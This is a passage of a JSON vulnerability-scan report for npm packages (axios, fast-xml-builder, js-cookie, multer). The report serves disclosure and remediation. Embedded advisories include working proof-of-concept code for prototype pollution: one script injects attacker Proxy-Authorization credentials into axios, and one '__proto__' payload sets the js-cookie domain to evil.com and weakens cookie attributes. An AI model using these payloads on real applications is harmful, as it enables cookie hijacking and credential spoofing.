Object Prototype Attributes", "Severity": "MEDIUM", "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L", "V3Score": 4.8 } }, "References": [ "https://github.com/axios/axios", "https://github.com/axios/axios/security/advisories/GHSA-898c-q2cr-xwhg", "https://nvd.nist.gov/vuln/detail/CVE-2018-16487" ] }, { "VulnerabilityID": "CVE-2026-44489", "VendorIDs": [ "GHSA-654m-c8p4-x5fp" ], "PkgID": "axios@1.15.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.15.2", "UID": "912ac8b12f666bfc" }, "InstalledVersion": "1.15.2", "FixedVersion": "1.16.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44489", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:2aa88b2a19a5c3a0aaf1445ec946188a0db213882f077db18439a751d64fd032", "Title": "Axios has a Patch Bypass: Proxy-Authorization Header Injection via Prototype Pollution — Incomplete Null-Prototype Fix", "Description": "# [Patch Bypass] Proxy-Authorization Header Injection via Prototype Pollution — Incomplete Null-Prototype Fix in Axios 1.15.2\n\n## Summary\n\nThe `Object.create(null)` fix introduced in Axios 1.15.2 (GHSA-q8qp-cvcw-x6jj) protects the **top-level config object** from prototype pollution. However, **nested objects** created by `utils.merge()` (e.g., `config.proxy`) are still constructed as plain `{}` with `Object.prototype` in their chain.\n\nThe `setProxy()` function at `lib/adapters/http.js:209-223` reads `proxy.username`, `proxy.password`, and `proxy.auth` **without `hasOwnProperty` checks**. When `Object.prototype.username` is polluted, `setProxy()` constructs a `Proxy-Authorization` header with attacker-controlled credentials and injects it into **every proxied HTTP request**.\n\n**Severity:** Medium (CVSS 5.4)\n**Affected Versions:** 1.15.2 (and potentially 1.15.1)\n**Vulnerable Component:** `lib/adapters/http.js` (`setProxy()`) + `lib/utils.js` (`merge()`)\n\n## CWE\n\n- **CWE-1321:** Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')\n- **CWE-113:** Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')\n\n## CVSS 3.1\n\n**Score: 5.6 (Medium)**\n\nVector: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L`\n\n| Metric | Value | Justification |\n|---|---|---|\n| Attack Vector | Network | PP triggered remotely via vulnerable dependency |\n| Attack Complexity | **High** | Requires **two** preconditions: (1) PP in dependency tree, AND (2) the application must explicitly configure `config.proxy`. Unlike GHSA-q8qp-cvcw-x6jj which affected all requests unconditionally |\n| Privileges Required | None | No authentication needed |\n| User Interaction | None | No user interaction required |\n| Scope | Unchanged | Within the proxy authentication context |\n| Confidentiality | **Low** | Attacker-controlled identity appears in proxy authentication logs, but the attacker does NOT see request/response data (unlike `config.baseURL` hijack) |\n| Integrity | **Low** | Proxy-Authorization header injected; proxy may apply different access policies based on injected identity |\n| Availability | **Low** | If proxy rejects the injected credentials, legitimate requests may fail |\n\n### Why This Is Lower Severity Than GHSA-q8qp-cvcw-x6jj (7.4 High)\n\n| Factor | GHSA-q8qp-cvcw-x6jj | This Finding |\n|---|---|---|\n| Precondition | **None** — all requests affected | Must have `config.proxy` set |\n| `config.baseURL` PP | Hijacks **all** relative URL requests | Not applicable |\n| `config.auth` PP | Injects `Authorization` to **target server** | Only injects `Proxy-Authorization` to **proxy** |\n| Attacker sees traffic | Yes (via baseURL redirect) | **No** — only proxy identity affected |\n| Impact scope | Universal — every axios request | Only requests with explicit proxy config |\n\n## This Is a Patch Bypass\n\nThis vulnerability **bypasses the fix** introduced in Axios 1.15.2 for GHSA-q8qp-cvcw-x6jj. The fix correctly uses `Object.create(null)` for the config object, blocking direct prototype pollution on `config.proxy`, `config.auth`, etc.\n\nHowever, the fix is **incomplete**: when a user legitimately sets `config.proxy = { host: 'proxy.corp', port: 8080 }`, the `mergeConfig()` function passes this object through `utils.merge()`, which creates a **new plain `{}` object** (`lib/utils.js:406: const result = {};`). This new object inherits from `Object.prototype`, re-opening the prototype pollution attack surface on the **nested** proxy object.\n\n| Layer | Protection | Status |\n|---|---|---|\n| `config` (top-level) | `Object.create(null)` | ✓ Fixed |\n| `config.proxy` (nested) | `utils.merge()` → `const result = {}` | **✗ NOT Fixed** |\n| `setProxy()` reads | `proxy.username`, `proxy.auth` without `hasOwnProperty` | **✗ NOT Fixed** |\n\n## Root Cause Analysis\n\n### Step 1: `utils.merge()` creates plain `{}` for nested objects\n\n**File:** `lib/utils.js`, line 406\n\n```javascript\nfunction merge(/* obj1, obj2, obj3, ... */) {\n const result = {}; // ← Plain object with Object.prototype!\n // ...\n}\n```\n\nWhen `mergeConfig()` processes `config.proxy`, `getMergedValue()` calls `utils.merge()`, which creates a plain `{}` for the nested object. This plain object inherits from `Object.prototype`.\n\n### Step 2: `setProxy()` reads proxy properties without `hasOwnProperty`\n\n**File:** `lib/adapters/http.js`, lines 209-223\n\n```javascript\nfunction setProxy(options, configProxy, location) {\n let proxy = configProxy;\n // ...\n if (proxy) {\n if (proxy.username) { // ← traverses Object.prototype!\n proxy.auth = (proxy.username || '') + ':' + (proxy.password || '');\n }\n\n if (proxy.auth) { // ← traverses Object.prototype!\n const validProxyAuth = Boolean(proxy.auth.username || proxy.auth.password);\n if (validProxyAuth) {\n proxy.auth = (proxy.auth.username || '') + ':' + (proxy.auth.password || '');\n }\n // ...\n const base64 = Buffer.from(proxy.auth, 'utf8').toString('base64');\n options.headers['Proxy-Authorization'] = 'Basic ' + base64; // ← INJECTED!\n }\n // ...\n }\n}\n```\n\n### Complete Attack Chain\n\n```\nObject.prototype.username = 'attacker'\nObject.prototype.password = 'stolen-creds'\n │\n ▼\n User config: { proxy: { host: 'proxy.corp', port: 8080 } }\n │\n ▼\n mergeConfig() → utils.merge() → new plain {}\n config.proxy = { host: 'proxy.corp', port: 8080 } (own properties)\n config.proxy inherits from Object.prototype (has .username, .password)\n │\n ▼\n setProxy() at http.js:209:\n proxy.username → 'attacker' (from Object.prototype) → truthy!\n proxy.auth = 'attacker' + ':' + 'stolen-creds'\n │\n ▼\n http.js:223: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz\n Injected into EVERY proxied HTTP request!\n```\n\n## Proof of Concept\n\n```javascript\nimport http from 'http';\nimport axios from './index.js';\n\n// Proxy server logs received Proxy-Authorization\nconst proxyServer = http.createServer((req, res) =\u003e {\n console.log('Proxy-Authorization:', req.headers['proxy-authorization']);\n res.writeHead(200);\n res.end('OK');\n});\nawait new Promise(r =\u003e proxyServer.listen(0, r));\nconst proxyPort = proxyServer.address().port;\n\n// Target server\nconst target = http.createServer((req, res) =\u003e { res.writeHead(200); res.end(); });\nawait new Promise(r =\u003e target.listen(0, r));\n\n// Simulate prototype pollution from vulnerable dependency\nObject.prototype.username = 'attacker';\nObject.prototype.password = 'stolen-creds';\n\n// Developer sets proxy WITHOUT auth — expects no auth header\nawait axios.get(`http://127.0.0.1:${target.address().port}/api`, {\n proxy: { host: '127.0.0.1', port: proxyPort, protocol: 'http' },\n});\n\n// Proxy receives: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz\n// Decoded: attacker:stolen-creds\n\ndelete Object.prototype.username;\ndelete Object.prototype.password;\nproxyServer.close();\ntarget.close();\n```\n\n## Reproduction Environment\n\n```\nAxios version: 1.15.2 (latest patched release)\nNode.js version: v20.20.2\nOS: macOS Darwin 25.4.0\n```\n\n## Reproduction Steps\n\n```bash\n# 1. Install axios 1.15.2\nnpm pack axios@1.15.2\ntar xzf axios-1.15.2.tgz \u0026\u0026 mv package axios-1.15.2\ncd axios-1.15.2 \u0026\u0026 npm install\n\n# 2. Save PoC as poc.mjs (code from Section 7 above)\n\n# 3. Run\nnode poc.mjs\n```\n\n## Verified PoC Output\n\n```\n=== Axios 1.15.2: PP → Proxy-Authorization Injection ===\n\n[1] Normal request with proxy (no auth):\n Proxy-Authorization: none\n\n[2] Prototype Pollution: Object.prototype.username = \"attacker\"\n Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz\n Decoded: attacker:stolen-creds\n → PP injected proxy credentials: attacker:stolen-creds\n\n[3] Impact:\n ✗ Attacker injects Proxy-Authorization into all proxied requests\n ✗ If proxy logs auth, attacker credential appears in proxy logs\n ✗ If proxy authenticates based on this, attacker controls proxy identity\n ✗ Works on 1.15.2 despite null-prototype config fix\n ✗ Root cause: proxy object is plain {} from utils.merge, NOT null-prototype\n```\n\n### Confirming the Bypass Mechanism\n\n```\nDirect PP (config.proxy) — BLOCKED by 1.15.2:\n Object.prototype.proxy = { host: 'evil' }\n config.proxy = undefined ← null-prototype blocks ✓\n\nNested PP (proxy.username) — BYPASSES 1.15.2:\n Object.prototype.username = 'attacker'\n config.proxy = { host: 'legit', port: 8080 } ← user-set, own properties\n config.proxy own keys: ['host', 'port'] ← username NOT own\n config.proxy.username = 'attacker' ← inherited from Object.prototype!\n hasOwn(config.proxy, 'username') = false\n```\n```\n\n## Impact Analysis\n\n- **Proxy Identity Spoofing:** The injected `Proxy-Authorization` header authenticates all requests to the proxy as the attacker. If the proxy enforces authentication-based access control or logging, the attacker controls the identity.\n- **Proxy Log Poisoning:** Proxy servers that log authenticated usernames will record \"attacker\" instead of the real user, enabling audit trail manipulation.\n- **Credential Injection Amplification:** If the proxy forwards the `Proxy-Authorization` header upstream (some transparent proxies do), the attacker's credentials propagate through the proxy chain.\n- **Universal Scope When Proxy Is Configured:** Affects every axios request that uses a proxy configuration without explicit auth — a common pattern in corporate environments.\n\n### Prerequisite\n\n- Application must use `config.proxy` (explicit proxy configuration)\n- A separate prototype pollution vulnerability must exist in the dependency tree\n- `Object.prototype.username` or `Object.prototype.auth` must be polluted\n\n## Recommended Fix\n\n### Fix 1: Use `hasOwnProperty` in `setProxy()`\n\n```javascript\nfunction setProxy(options, configProxy, location) {\n let proxy = configProxy;\n // ...\n if (proxy) {\n const hasOwn = (obj, key) =\u003e Object.prototype.hasOwnProperty.call(obj, key);\n\n if (hasOwn(proxy, 'username')) {\n proxy.auth = (proxy.username || '') + ':' + (proxy.password || '');\n }\n\n if (hasOwn(proxy, 'auth')) {\n // ... existing auth handling ...\n }\n }\n}\n```\n\n### Fix 2: Use null-prototype objects in `utils.merge()`\n\n```javascript\n// lib/utils.js line 406\nfunction merge(/* obj1, obj2, obj3, ... */) {\n const result = Object.create(null); // ← null-prototype for nested objects too\n // ...\n}\n```\n\n### Fix 3 (Comprehensive): Apply null-prototype to all objects created by `getMergedValue()`\n\n## References\n\n- [CWE-1321: Prototype Pollution](https://cwe.mitre.org/data/definitions/1321.html)\n- [GHSA-q8qp-cvcw-x6jj: Original PP Gadgets Fix (Axios 1.15.2)](https://github.com/advisories/GHSA-q8qp-cvcw-x6jj)\n- [GHSA-fvcv-3m26-pcqx: Related PP Gadget (Axios 1.15.0)](https://github.com/advisories/GHSA-fvcv-3m26-pcqx)\n- [Axios GitHub Repository](https://github.com/axios/axios)", "Severity": "LOW", "VendorSeverity": { "ghsa": 1 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 3.7 } }, "References": [ "https://github.com/axios/axios", "https://github.com/axios/axios/security/advisories/GHSA-654m-c8p4-x5fp", "https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj" ] }, { "VulnerabilityID": "CVE-2026-44665", "VendorIDs": [ "GHSA-5wm8-gmm8-39j9" ], "PkgID": "fast-xml-builder@1.1.5", "PkgName": "fast-xml-builder", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-builder@1.1.5", "UID": "bcd6b653d167fc58" }, "InstalledVersion": "1.1.5", "FixedVersion": "1.1.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44665", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:862a22fe97d8e2ac17e34d368e0b72e83f76a55c3a37e0c966031fc2e8faed54", "Title": "fast-xml-builder: fast-xml-builder: Attribute injection leading to information disclosure or content manipulation", "Description": "fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input data has quotes in attribute values but process entities is not enabled, it breaks the attribute value into multiple attributes. This gives the room for an attacker to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in 1.1.7.", "Severity": "HIGH", "CweIDs": [ "CWE-91" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "V3Score": 6.1, "V40Score": 8.7 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-44665", "https://github.com/NaturalIntelligence/fast-xml-builder", "https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-5wm8-gmm8-39j9", "https://nvd.nist.gov/vuln/detail/CVE-2026-44665", "https://www.cve.org/CVERecord?id=CVE-2026-44665" ], "PublishedDate": "2026-05-13T16:16:59.093Z", "LastModifiedDate": "2026-05-18T16:16:31.7Z" }, { "VulnerabilityID": "CVE-2026-44664", "VendorIDs": [ "GHSA-45c6-75p6-83cc" ], "PkgID": "fast-xml-builder@1.1.5", "PkgName": "fast-xml-builder", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-builder@1.1.5", "UID": "bcd6b653d167fc58" }, "InstalledVersion": "1.1.5", "FixedVersion": "1.1.6", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44664", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:ab3fefec70197801d4a1a62dd5f3cb44d51201bfd0c04a160286722807d9309d", "Title": "fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient sanitization of XML comments", "Description": "fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650 in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g, '- -'). This skip the values containing three consecutive dashes (e.g., ---\u003e...), allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML content. This vulnerability is fixed in 1.1.6.", "Severity": "MEDIUM", "CweIDs": [ "CWE-91" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-44664", "https://github.com/NaturalIntelligence/fast-xml-builder", "https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-45c6-75p6-83cc", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6", "https://nvd.nist.gov/vuln/detail/CVE-2026-44664", "https://www.cve.org/CVERecord?id=CVE-2026-44664" ], "PublishedDate": "2026-05-13T16:16:58.937Z", "LastModifiedDate": "2026-05-13T16:58:09.717Z" }, { "VulnerabilityID": "CVE-2026-46625", "VendorIDs": [ "GHSA-qjx8-664m-686j" ], "PkgID": "js-cookie@3.0.5", "PkgName": "js-cookie", "PkgIdentifier": { "PURL": "pkg:npm/js-cookie@3.0.5", "UID": "5d41bd0ebbab8dd6" }, "InstalledVersion": "3.0.5", "FixedVersion": "3.0.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-46625", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:e099fff0bec9b1d2148494caecb21d42e895c7307d2b35fd6c44b0cef26edfeb", "Title": "JavaScript Cookie: Per-instance prototype hijack in assign() enables cookie-attribute injection", "Description": "## Summary\n\n`js-cookie`'s internal `assign()` helper copies properties with `for...in` + plain assignment. When the source object is produced by `JSON.parse`, the JSON object's `\"__proto__\"` member is an *own enumerable* property, so the `for…in` enumerates it and the `target[key] = source[key]` write triggers the **`Object.prototype.__proto__` setter** on the fresh `target` (`{}`). The result is a per-instance prototype hijack: `Object.prototype` itself is untouched, but the merged `attributes` object now inherits attacker-controlled keys.\n\nBecause the consuming `set()` function then enumerates the merged object with another `for...in`, every key the attacker placed on the polluted prototype lands in the resulting `Set-Cookie` string as an attribute pair. The attacker can set `domain=`, `secure=`, `samesite=`, `expires=`, and `path=` on cookies whose attributes the developer thought were locked down.\n\n## Impact\n\nAny application that forwards a JSON-derived object as the `attributes` argument to `Cookies.set`, `Cookies.remove`, `Cookies.withAttributes`, or `Cookies.withConverter` is vulnerable. This is the standard pattern when cookie configuration comes from a backend:\n\n```js\nconst cfg = await fetch('/config').then(r =\u003e r.json());\nCookies.set('session', token, cfg.cookieAttrs); // cfg.cookieAttrs influenced by attacker\n```\n\nA payload of `{\"__proto__\":{\"domain\":\"evil.example\",\"secure\":\"false\",\"samesite\":\"None\"}}` causes js-cookie to emit:\n\n```\nSet-Cookie: session=TOKEN; path=/; domain=evil.example; secure=false; samesite=None\n```\n\n## Affected code\n\n```js\n// src/assign.mjs — full file\nexport default function (target) {\n for (var i = 1; i \u003c arguments.length; i++) {\n var source = arguments[i]\n for (var key in source) { // includes own enumerable '__proto__'\n target[key] = source[key] // [[Set]] form - fires __proto__ setter\n }\n }\n return target\n}\n```\n## Proof of concept\n\nNode 22.11.0, no third-party deps:\n\n### Environment setup\n```bash\nmkdir -p /tmp/jscookie-poc \u0026\u0026 cd /tmp/jscookie-poc\nnpm init -y\nnpm i js-cookie\n```\n\n### PoC\n```js\nubuntu@kuber:/tmp/jscookie-poc$ cat poc.mjs\nlet lastSetCookie = '';\nglobalThis.document = {\n get cookie() { return ''; },\n set cookie(v) { lastSetCookie = v; }\n};\n\nconst { default: Cookies } = await import('js-cookie');\n\nconst attackerAttrs = JSON.parse(\n '{\"__proto__\":{\"secure\":\"false\",\"domain\":\"evil.com\",\"samesite\":\"None\",\"expires\":-1}}'\n);\n\nCookies.set('session', 'TOKEN', attackerAttrs);\n\nconsole.log('Set-Cookie that js-cookie wrote to document.cookie:');\nconsole.log(lastSetCookie);\n```\n\nExecution:\n\u003cimg width=\"2614\" height=\"1174\" alt=\"cls-2026-05-14-01 44 39\" src=\"https://github.com/user-attachments/assets/120df1fe-7e97-4ca3-904e-ab80d71ecf62\" /\u003e\n\n## Suggested patch\n\n```diff\n--- a/src/assign.mjs\n+++ b/src/assign.mjs\n@@\n export default function (target) {\n for (var i = 1; i \u003c arguments.length; i++) {\n var source = arguments[i]\n- for (var key in source) {\n- target[key] = source[key]\n- }\n+ for (var key in source) {\n+ if (key === '__proto__' || key === 'constructor' || key === 'prototype') continue\n+ Object.defineProperty(target, key, {\n+ value: source[key],\n+ writable: true,\n+ enumerable: true,\n+ configurable: true,\n+ })\n+ }\n }\n return target\n }\n```\n\nEquivalent one-liner alternative - iterate own names only and filter:\n\n```js\nfor (const key of Object.getOwnPropertyNames(source)) {\n if (key === '__proto__') continue\n target[key] = source[key]\n}\n```", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 7.5 } }, "References": [ "https://github.com/js-cookie/js-cookie", "https://github.com/js-cookie/js-cookie/security/advisories/GHSA-qjx8-664m-686j" ] }, { "VulnerabilityID": "CVE-2025-47935", "VendorIDs": [ "GHSA-44fp-w29j-9vj5" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "9de8074040ba33ce" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.0.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-47935", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:0d81a12ef79a65475ff2909292736458faa6dcb41dd0bc96fc4abf6b59141490", "Title": "Multer vulnerable to Denial of Service via memory leaks from unclosed streams", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-401" ], "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", "https://github.com/expressjs/multer/pull/1120", "https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5", "https://nvd.nist.gov/vuln/detail/CVE-2025-47935" ], "PublishedDate": "2025-05-19T20:15:25.863Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, { "VulnerabilityID": "CVE-2025-47944", "VendorIDs": [ "GHSA-4pg4-qvpc-4q3h" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "9de8074040ba33ce" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.0.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-47944", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:711625bfeec534118e27dfefeb867e1c668103c0ae3ca091d0374abaa84fd8a4", "Title": "Multer vulnerable to Denial of Service from maliciously crafted requests", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-248" ], "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", "https://github.com/expressjs/multer/issues/1176", "https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h", "https://nvd.nist.gov/vuln/detail/CVE-2025-47944" ], "PublishedDate": "2025-05-19T20:15:26.007Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, { "VulnerabilityID": "CVE-2025-48997", "VendorIDs": [ "GHSA-g5hg-p3ph-g8qg" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "9de8074040ba33ce" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-48997", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:95421d79dd30e3c9af6bb386055b7735b93c48cbe6550379e937a101a0a992bb", "Title": "multer: Multer vulnerable to Denial of Service via unhandled exception", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to `2.0.1` to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-248" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-48997", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9", "https://github.com/expressjs/multer/issues/1233", "https://github.com/expressjs/multer/pull/1256", "https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg", "https://nvd.nist.gov/vuln/detail/CVE-2025-48997", "https://www.cve.org/CVERecord?id=CVE-2025-48997" ], "PublishedDate": "2025-06-03T19:15:39.577Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, { "VulnerabilityID": "CVE-2025-7338", "VendorIDs": [ "GHSA-fjgf-rc76-4x9p" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "9de8074040ba33ce" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.0.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-7338", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:b2387b8af5cb4509c4c2cb410f25cee6bb8549ac3680722071bf58310dec9488", "Title": "multer: Multer Denial of Service", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.2 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-248" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-7338", "https://cna.openjsf.org/security-advisories.html", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b", "https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p", "https://nvd.nist.gov/vuln/detail/CVE-2025-7338", "https://www.cve.org/CVERecord?id=CVE-2025-7338" ], "PublishedDate": "2025-07-17T16:15:35.227Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, { "VulnerabilityID": "CVE-2026-2359", "VendorIDs": [ "GHSA-v52c-386h-88mc" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "9de8074040ba33ce" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.1.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2359", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:5a3c827841892d60aab9efae04e4f94281be00956436e11b42a2ae49b44abd19", "Title": "multer: Multer: Denial of Service via dropped file upload connections", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-772" ], "VendorSeverity": { "ghsa": 3, "nvd": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", 